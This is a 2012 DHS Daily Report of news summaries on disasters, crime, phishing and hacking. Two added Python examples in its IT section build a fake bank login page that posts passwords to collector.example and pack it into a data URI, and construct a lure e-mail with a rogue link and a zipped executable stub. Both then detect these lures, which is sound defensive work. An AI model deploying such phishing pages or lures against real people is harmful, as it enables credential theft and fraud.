Wednesday, September 5, 2012

Complete DHS Daily Report for September 5, 2012

Daily Report

Top Stories

• Law enforcement officials ordered the evacuation of homes and businesses within a half-mile of a storm-damaged chemical plant in Braithwaite, Louisiana, to guard against possible contamination or fire. – New Orleans Times-Picayune

7. September 3, New Orleans Times-Picayune – (Louisiana) Days after Isaac, homes near Stolthaven chemical plant in Braithwaite evacuated. Law enforcement officials ordered the evacuation of homes within a half-mile of a storm-damaged chemical plant in Braithwaite, Louisiana, to guard against possible contamination or fire, the New Orleans Times-Picayune reported September 3. A Louisiana State Police (LSP) spokeswoman said teams with the U.S. Environmental Protection Agency and the State Department of Environmental Quality were evaluating the Stolthaven New Orleans plant, which had been without power since Hurricane Isaac flooded it. The reason for the evacuation days after the storm was not immediately clear, but the spokeswoman said the company alerted the LSP's hazardous materials division about potentially harmful and flammable chemicals inside. Plaquemines' east bank was already under a mandatory evacuation order from Isaac, but authorities worked September 3 to clear out the residents near the plant who had stayed anyway. A parish spokeswoman said police closed English Turn Road within the evacuation perimeter. The evacuation only affects homes and businesses along the levee, the LSP spokeswoman said. Source: http://www.nola.com/hurricane/index.ssf/2012/09/days_after_isaac_stolthaven_ch.html

• A freight train struck the rear of another freight train in Chicago, derailing eight rail cars, and knocking out power to more than 2,500 people. – Associated Press

17. September 2, Associated Press – (Illinois) Freight train derailment in Chicago. A freight train struck the rear of another freight train in Chicago September 2, derailing eight full-sized rail cars and damaging a third freight train on an adjacent track, authorities said. Local reports said power was briefly knocked out to more than 2,500 people in the surrounding area. There were no immediate reports of any injuries following the derailment, a CSX rail spokesman said. At least one of the trains was carrying liquid waste, a Chicago fire official and media affairs director told the Chicago Sun-Times. One train formation bound from Nashville, Tennessee, to Chicago had two locomotives and 13 freight cars; another from Albany, New York, to Chicago had four locomotives and 93 freight cars and a third on a route from Flint, Michigan, to Chicago had two locomotives and 130 freight cars. The report said emergency crews initially called for a hazardous materials response as a precaution, but no hazardous materials were detected and no leaks discovered. Source: http://www.13wham.com/news/local/story/freight-train-derailment-chicago/m3FfsGBDeE6ZQaaNTQnHmQ.cspx

• Hacker group AntiSec published what it claims is about 1 million unique device identifier numbers for Apple devices that it said it accessed earlier in 2012 from a computer belonging to an FBI agent. – Computerworld See item 40 below in the Information Technology Sector

• Three people were injured when a large four-wheel-drive truck veered out of control into the spectator area during a race in Harrisburg, Oregon. – Associated Press

53. September 2, Associated Press – (Oregon) Monster truck mishap in Ore. sends 3 to hospital. A large four-wheel-drive truck veered out of control during a race at Harrisburg MotorSports Complex in Harrisburg, Oregon, struck a barrier, and crossed into the spectator area, where three people were injured, authorities said. The three hurt September 1 were taken to a hospital, said a Linn County sheriff. Sheriff's officials said their injuries were not life-threatening. The 1975 Ford pickup, fitted with large tractor tires, had slowed to about 10 mph just before coming to a stop, the sheriff said. Emergency crews responded to the complex about 30 minutes after "Monster Air 2012" began. The owner of the complex said numerous precautions had been taken to keep spectators safe. However, he said the truck's hydraulic steering went out suddenly during a two-truck race and that the driver could not stop it as it veered into the spectator area. He said about 1,000 people attended the event. Source: http://beatricedailysun.com/news/national/monster-truck-mishap-in-ore-sends-to-hospital/article_aafa3f41-2067-5696-b4e5-e8c8f8d8674c.html

• A spokeswoman for St. Tammany Parish, Louisiana, said officials were working to relieve pressure on Lock 2 on the Pearl River Diversion Canal that was in danger of failing and flooding homes. – Associated Press

61. September 1, Associated Press – (Louisiana) Evacuation called near Pearl River diversion canal; parish works to ease pressure on lock. A spokeswoman for St. Tammany Parish, Louisiana, said officials were working to relieve pressure on Lock 2 on the Pearl River Diversion Canal that was in danger of failing and flooding homes near a canal that branches off the Pearl River. An evacuation was ordered the evening of September 1 for part of rural St. Tammany. The order affected as many as 2,000 people. Area waterways were swollen because of heavy rains from Hurricane Isaac. The State said the U.S. Army Corps of Engineers operates the lock. The parish spokeswoman said the parish got permission from the Corps to relieve pressure on the structure by opening a valve that will allow a controlled flow of water through it. Source: http://www.therepublic.com/view/story/31405ebf5de6480aa809da4cfd6231bb/LA--Isaac-Lock-Failure

Details

Banking and Finance Sector

10. September 4, Help Net Security – (International) Fake AmEx ‘security verification’ phishing emails doing rounds. Malicious spam emails impersonating American Express (AmEx) have been hitting inboxes in the last few days, trying to make recipients open an attached HTML file to gather personal information, Help Net Security reported September 4. The email purports to be a notification about a "Membership Security Verification," and warns users that a "slight error" has been detected in their AmEx accounts. To make it right, and to avoid losing access to their accounts within 48 hours, the victims are urged to download the attached HTML file and open it in a browser. Because the form is carried inside the attachment rather than hosted on a Web site, there is no phishing URL for mail filters or browser blocklists to match; only the form's submission target points back to the attackers. The phishers are looking for every bit of personal and financial data they can get, including the user's name, address, home and work telephone numbers, Social Security number, mother's maiden name, date of birth, AmEx credit card number, expiration date, card security code, ATM PIN, email address, and the password for that email account. All of the information submitted on the fake form will be sent to online criminals and subsequently used to steal the identities of victims as well as use their credit card details to conduct fraudulent transactions, according to Hoax-Slayer. Source: http://www.net-security.org/secworld.php?id=13520

11. September 3, WJAC 6 Johnstown – (Pennsylvania) Man accused of trying to kidnap bank manager surrenders to authorities inside bar. A fugitive wanted for the attempted kidnapping of a bank manager in Emporium, Pennsylvania, during August was spotted inside a bar and turned himself in to police September 3. Court documents said that August 8 the man tried abducting the bank manager who worked at the branch that foreclosed on his house. The woman escaped unharmed and the man had been on the run since the incident. He was arraigned on kidnapping, aggravated assault, terrorist threats, unlawful restraint, false imprisonment, reckless endangerment, and disorderly conduct charges and was booked into the Potter County Jail. Borough police, State police, and the FBI were still looking into the incident. Source: http://www.wjactv.com/news/news/man-accused-trying-kidnap-bank-manager-surrenders-/nR2x4/

12. September 1, Arizona Daily Star – (Arizona) Tucson bank robbery suspect turns himself in to authorities. A man who was connected to a string of bank robberies in the Tucson, Arizona area during August was arrested September 1 after turning himself in, police said. The man was booked into Pima County jail on three counts of robbery after he was accused of holding up a Pima Federal Credit Union August 21. According to police, the suspect threatened a bank teller with a note before fleeing with an undisclosed amount of money. He is also facing charges for two other robberies on the city's northwest side. Authorities also connected him with at least one robbery in the Phoenix area. Source: http://azstarnet.com/news/local/crime/fbi-looking-for-smokey-the-bandit-bank-robber/article_c739aa94-f488-11e1-b011-0019bb2963f4.html

13. September 1, McAllen Monitor – (Texas) Man convicted of credit card scheme. One of the men behind a high-tech credit card scheme operating out of McAllen, Texas, pleaded guilty to federal fraud charges and is awaiting sentencing, the McAllen Monitor reported September 1. The man admitted to possessing various debit and bank account numbers. The U.S. Secret Service brought federal fraud charges against him and other defendants in July after police discovered hundreds of fraudulent credit cards, gift cards, computers, cocaine, steroids, thousands of dollars in cash, and other brand new electronics at two apartments in McAllen, a criminal complaint stated. During the investigation, authorities found that he had more than $130,000 in a U.S. bank. Source: http://www.themonitor.com/news/scheme-63489-card-convicted.html

14. August 31, KCBS 2 Los Angeles – (California) ‘Haggler Bandit’ allegedly linked to series of bank robberies in 10 days. The so-called "Haggler Bandit" allegedly struck again in Los Angeles August 31, robbing a bank and attempting to steal from another, according to the FBI. The suspect reportedly robbed a Citibank branch and tried to steal from a Chase bank. Authorities said he threatened tellers with a gun in the attempted robbery. August 30, the bandit robbed a Chase bank in Monrovia and attempted to rob a Wells Fargo branch in Pasadena. The incidents started August 22 at a Citibank in Pasadena. The "Haggler Bandit" was given the nickname by bank tellers who said he "haggled" over the amount of money he expected to get based on his demand for cash. Source: http://losangeles.cbslocal.com/2012/08/31/haggler-bandit-allegedly-linked-to-series-of-bank-robberies-in-10-days/

Information Technology Sector

38. September 4, The H – (International) VMware secures server products. VMware released an advisory, VMSA-2012-0013, which addresses vulnerabilities in open source components bundled with VMware vCenter 4.1, VMware vCenter Update Manager 4.1, VMware ESX and ESXi, and VMware vCOps 5.0.2 or earlier. Among the upgraded components are OpenSSL, Perl, libxml2, and the Linux kernel. Source: http://www.h-online.com/security/news/item/VMware-secures-server-products-1698343.html

39. September 4, The H – (International) Google suspicious sign-in alert contains a trojan. Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from "accounts-noreply@google(dot)com" with the subject "Suspicious sign in prevented" is being sent en masse, claiming a hijacker attempted to access the mail recipient's Google Account. The message says the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim's system. While Google does sometimes send emails like this to users, they never contain attachments; users that receive such an email are advised to delete it. According to VirusTotal, the trojan is currently detected by only about half of the 42 anti-virus engines used by the online virus scanner service, so a single anti-virus product on the desktop is not a reliable safeguard against this sample. Source: http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html

40. September 4, Computerworld – (International) Hacker group claims access to 12M Apple device IDs. Hacker group AntiSec published what it claims is about 1 million unique device identifier numbers (UDIDs) for Apple devices that it said it accessed earlier in 2012 from a computer belonging to an FBI agent. The group, which is a splinter operation of the Anonymous hacking collective, claims it culled more than 12 million UDIDs and personal data linking the devices to users from the FBI computer. AntiSec said it chose to publish a portion of those records to prove it has them. In a note on Pastebin, a member of AntiSec said the group stripped some personal data, such as full names and cell numbers, out of the published records. Instead, the group said it published enough information, such as device type, device ID, and Apple Push Notification Service tokens, to let users determine whether their devices are on the list. It was not immediately possible to verify the authenticity of AntiSec's claims about the data. Source: http://www.computerworld.com/s/article/9230883/Hacker_group_claims_access_to_12M_Apple_device_IDs

41. September 3, The Register – (International) Firefox, Opera allow crooks to hide an entire phish site in a link. A shortcoming in browsers including Firefox and Opera allows cyber criminals to hide an entire malicious Web page in a clickable link, ideal for fooling victims into handing over passwords and other sensitive data. Usually, phishing attacks rely on tricking users into visiting Web sites designed by criminals to masquerade as banks and online stores, thus stealing their credentials and bank account details when they try to use the bogus pages. However, this requires finding somewhere to host the counterfeit sites, which are often quickly taken down by hosting companies and the authorities or blocked by filters. Instead, the malicious Web pages can be stored in data uniform resource identifiers (URIs), not to be confused with URLs. A data URI embeds the page's own HTML (typically base64-encoded) in the link string itself; when the link is clicked, the browser decodes the payload and renders it as a page, with no request to any server. This negates the need to find a place to host the malicious page, and once shortened using a service such as TinyURL, the long data URI can be reduced to a small URL, perfect for passing around social networks, online chats, and email. Crooks may still need to set up a server to receive the data victims type into the form, however, and that collection endpoint is the one network indicator such a phish leaves behind. Source: http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/
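The following is an added example and is not code from the article or from any of the parties it describes. It packs a constructed credential-harvesting page into a data:text/html;base64 URI exactly as item 41 describes, then shows the check a mail or chat filter would want: decode the data URI, parse the embedded HTML, and flag a page that contains a password field whose form posts to a remote host. The login page, the "Example Bank" branding, and the collection host collector.example are all made up for the example.

```python
"""Phishing page packed into a data: URI, and a checker that unpacks it.

Added example, not taken from the article. PHISH_HTML and the host
collector.example are constructed for illustration.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed phishing page: a login form that posts credentials to a
# hypothetical attacker-controlled collection server (collector.example).
PHISH_HTML = """<!doctype html>
<html><head><title>Example Bank - Sign in</title></head>
<body><h1>Example Bank</h1>
<form method="post" action="http://collector.example/grab.php">
  User ID <input name="user"><br>
  Password <input type="password" name="pass"><br>
  <input type="submit" value="Sign in">
</form></body></html>"""


def pack_as_data_uri(html):
    """Encode a whole page as data:text/html;base64,... (the technique in item 41)."""
    payload = base64.b64encode(html.encode("utf-8")).decode("ascii")
    return "data:text/html;base64," + payload


# data:[<mediatype>][;param...][;base64],<data>
DATA_URI_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)$", re.S)


def unpack_data_uri(uri):
    """Return (mime type, decoded bytes) for a data: URI.

    Handles both the base64 form and the plain percent-encoded form; an
    omitted media type defaults to text/plain as the data: scheme specifies.
    """
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    mime = m.group("mime") or "text/plain"
    params = m.group("params") or ""
    body = m.group("body")
    if ";base64" in params.lower():
        data = base64.b64decode(body)
    else:
        data = unquote(body).encode("utf-8")
    return mime, data


class _FormScanner(HTMLParser):
    """Collect form actions and count password inputs in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def inspect_link(uri):
    """Classify a link. A data: URI carrying HTML with a password form that
    posts to some host is the self-contained phish described in the article."""
    result = {"is_data_uri": False, "mime": None, "form_hosts": [],
              "password_fields": 0, "suspicious": False}
    if not uri.lower().startswith("data:"):
        return result
    mime, data = unpack_data_uri(uri)
    result["is_data_uri"] = True
    result["mime"] = mime
    if mime.lower() != "text/html":
        return result
    scanner = _FormScanner()
    scanner.feed(data.decode("utf-8", errors="replace"))
    hosts = [urlparse(a).netloc for a in scanner.actions]
    result["form_hosts"] = [h for h in hosts if h]
    result["password_fields"] = scanner.password_fields
    # The page asks for a password and ships it off to a remote host: flag it.
    result["suspicious"] = scanner.password_fields > 0 and bool(result["form_hosts"])
    return result


if __name__ == "__main__":
    link = pack_as_data_uri(PHISH_HTML)
    print("%d-character link, begins %s..." % (len(link), link[:30]))
    print(inspect_link(link))
```

The only host that appears anywhere in the decoded page is the form's action target, which is why the checker reports form hosts rather than page URLs: for a data-URI phish, the collection endpoint is the indicator worth blocking, and a URL shortener in front of the link hides nothing once the link is expanded and decoded.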

42. September 3, The Inquirer – (International) Hackers claim Sony Mobile scalps. A group of hackers claimed it seized control of eight Sony servers because of the firm's lax security. The group called Null Crew made the claim on Twitter and via a Pastebin release. The release shows a list of usernames and passwords that apparently relate to Sonymobile.com, and a message to Sony that accuses the firm of not having strong enough security credentials. Source: http://www.theinquirer.net/inquirer/news/2202355/hackers-claim-sony-mobile-scalps

43. September 3, IDG News Service – (International) Rogue Microsoft Services Agreement emails lead to latest Java exploit. Hackers are distributing rogue email notifications about changes in Microsoft's Services Agreement to trick people into visiting malicious pages that use a recently circulated Java exploit to infect their computers with malware. The rogue email messages are copies of legitimate notifications that Microsoft sent out to users to announce changes to the company's Services Agreement that will take effect October 19. However, in the malicious versions of the emails, the correct links were replaced with links to compromised Web sites that host attack pages from the Blackhole exploit toolkit. Because the text is copied from a genuine notification, the only visible difference is where the links point, so checking link targets against the claimed sender's domain matters more than the wording. Source: http://www.computerworld.com/s/article/9230858/Rogue_Microsoft_Services_Agreement_emails_lead_to_latest_Java_exploit
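The three mail lures in this report (item 10's HTML form attachment, item 39's zip file wrapping a Windows executable, and item 43's copied notification with swapped links) can be caught by the same triage pass over a message. The following is an added example, not code from any of the articles or vendors named: it constructs a sample message that combines all three patterns and runs a triage function over it. The message, the sender and recipient addresses, and the host badhost.example are made up; the domain comparison is deliberately crude (last two labels) and a production filter would use a public suffix list.

```python
"""Triage of a suspect e-mail: link hosts and attachments.

Added example, not taken from the articles. build_sample_message() constructs
a lure that combines the three patterns described; badhost.example and the
addresses are hypothetical.
"""
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions Windows will execute directly when double-clicked from a zip.
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")


def build_sample_message():
    """Construct (not captured) a lure with all three patterns from the report."""
    msg = EmailMessage()
    msg["From"] = "Microsoft <noreply@microsoft.com>"   # claimed sender
    msg["To"] = "user@example.org"
    msg["Subject"] = "Important Changes to Microsoft Services Agreement"
    msg.set_content("Please review the attached details.")
    # Copied notification text, but one link now points at an attack host (item 43).
    msg.add_alternative(
        '<p>Review the updated agreement '
        '<a href="http://badhost.example/agreement">here</a> or on '
        '<a href="https://www.microsoft.com/servicesagreement">microsoft.com</a>.</p>',
        subtype="html")
    # HTML form shipped as an attachment (item 10).
    msg.add_attachment("<form action='http://badhost.example/collect'>...</form>",
                       subtype="html", filename="verify.html")
    # Zip archive containing a Windows executable (item 39).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("suspicious_signin_details.exe", b"MZ" + b"\0" * 64)
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="signin_details.zip")
    return bytes(msg)


class _LinkScanner(HTMLParser):
    """Collect href targets of <a> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def _registered_domain(host):
    """Crude last-two-labels comparison; real code would use a public suffix list."""
    return ".".join(host.lower().rsplit(".", 2)[-2:])


def triage(raw):
    """Return the claimed sender domain and a list of (finding, detail) pairs."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender = msg["From"].addresses[0].domain if msg["From"] else ""
    findings = []
    # Links in the HTML body whose host is not the claimed sender's domain.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        scanner = _LinkScanner()
        scanner.feed(body.get_content())
        mismatched = [h for h in scanner.hrefs
                      if urlparse(h).netloc and sender
                      and _registered_domain(urlparse(h).netloc) != _registered_domain(sender)]
        if mismatched:
            findings.append(("link-host-mismatch", mismatched))
    # Attachments: HTML files, and archives that carry executables.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ctype = part.get_content_type()
        if ctype == "text/html" or name.endswith((".htm", ".html")):
            findings.append(("html-attachment", name))
        if ctype in ("application/zip", "application/x-zip-compressed") or name.endswith(".zip"):
            data = part.get_payload(decode=True) or b""
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as z:
                    execs = [n for n in z.namelist() if n.lower().endswith(EXECUTABLE_EXT)]
            except zipfile.BadZipFile:
                findings.append(("corrupt-zip", name))
                continue
            if execs:
                findings.append(("executable-in-zip", execs))
    return {"sender_domain": sender, "findings": findings}


if __name__ == "__main__":
    for finding in triage(build_sample_message())["findings"]:
        print(*finding)
```

The archive is opened in memory and only its directory is read, so nothing from it is written to disk; the Google lure in item 39 would be reported as executable-in-zip regardless of whether the anti-virus engines on the host recognise the particular trojan inside.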

44. August 31, The Register – (International) Philips databases pillaged and leaked second time in a month. Electronics giant Philips was hacked for the second time in a month and its databases raided. Usernames and encrypted passwords were leaked after the breach. It is unclear whether email addresses or the actual contents of corporate emails were included in the records dumped from the company's SQL databases. The lifted data was uploaded to various file hosting sites by hacktivists, who used blogs (since taken down by Google's Blogspot service) and social networks, using the hashtag labels "AntiSec" and "LulzSecReborn" to spread the word. "All together there is [sic] well over 200,000 emails with at least 1,000 of them have further vital credentials that could allow others to use the users' personal information," according to a Web site run by Anonymous. The site reports that Anonymous-affiliated hackers in Sweden announced the raid. The latest attack follows a smaller leak of a few thousand records from Philips by r00tbeersec, another hacktivist crew, about a week ago. Source: http://www.theregister.co.uk/2012/08/31/philips_anon_hack/

45. August 31, The H – (International) Chrome 21 update closes high-risk security holes. Three high-severity holes were fixed in Google's latest stable channel update to the Chrome Web browser. Version 21.0.1180.89 of Chrome for Windows, Mac OS X, and Linux addresses nine vulnerabilities in the Web browser, and fixes a number of non-security issues with Flash, developer tools, and gradient boxes. The high-severity vulnerabilities are two bad-cast bugs, one in the handling of XSL transforms and one in the handling of run-ins, and a stale buffer in URL loading. Additionally, the update fixes three medium-risk and three low-risk issues. Source: http://www.h-online.com/security/news/item/Chrome-21-update-closes-high-risk-security-holes-1696236.html

For another story, see item 10 above in the Banking and Finance Sector

Communications Sector

Nothing to report